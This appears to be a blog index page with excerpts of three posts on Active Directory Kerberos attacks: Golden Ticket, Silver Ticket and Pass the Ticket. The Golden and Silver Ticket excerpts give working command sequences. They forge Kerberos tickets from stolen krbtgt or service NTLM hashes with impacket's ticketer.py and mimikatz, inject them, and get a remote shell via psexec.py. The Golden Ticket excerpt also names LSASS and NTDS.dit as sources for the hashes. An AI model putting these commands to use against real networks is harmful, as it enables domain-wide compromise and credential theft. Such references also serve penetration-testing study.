Golden Ticket

7. Golden ticket: similar to a Silver Ticket, but crafts a TGT using the NTLM hash of the krbtgt AD account, which allows access to any machine in the domain. The hash is obtained from the LSASS process or the NTDS.dit file of any DC in the domain.
Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows)
Linux:
ticketer.py -domain-sid SID -domain DOMAIN -nthash HASH USERNAME
export KRB5CCNAME=USERNAME.ccache
psexec.py DOMAIN\USERNAME@$IP -k -no-pass
Windows:
.\mimikatz.exe
kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME
kerberos::ptt TICKET....

January 21, 2025 · 1 min · 89 words

Pass the Ticket

5. Pass the ticket: similar to Pass The Key, but steals a ticket instead of requesting a ticket via a known hash. In Linux, tickets are stored in credential caches (ccache) in 3 main locations: files, /tmp/krb5cc_%{uid} (default); kernel keyrings, a special space in the Linux kernel for storing keys; and process memory, used when only one process needs to use the ticket. In Windows, tickets are handled and stored by the LSASS (Local Security Authority Subsystem Service) process responsible for security....

January 21, 2025 · 1 min · 163 words

Silver Ticket

6. Silver ticket: crafts a valid TGS for a service after owning the NTLM hash of an account, and gains access to that service by forging a custom TGS with maximum privilege.
Tools: impacket’s ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows)
Linux:
ticketer.py -domain-sid SID -domain DOMAIN -spn SPN -nthash HASH USERNAME
export KRB5CCNAME=USERNAME.ccache
psexec.py DOMAIN\USERNAME@$IP -k -no-pass
Windows:
.\mimikatz.exe
kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME /service:SPN /target:DCHOSTNAME
kerberos::ptt TICKET.kirbi
or use Rubeus to do the same...

January 21, 2025 · 1 min · 80 words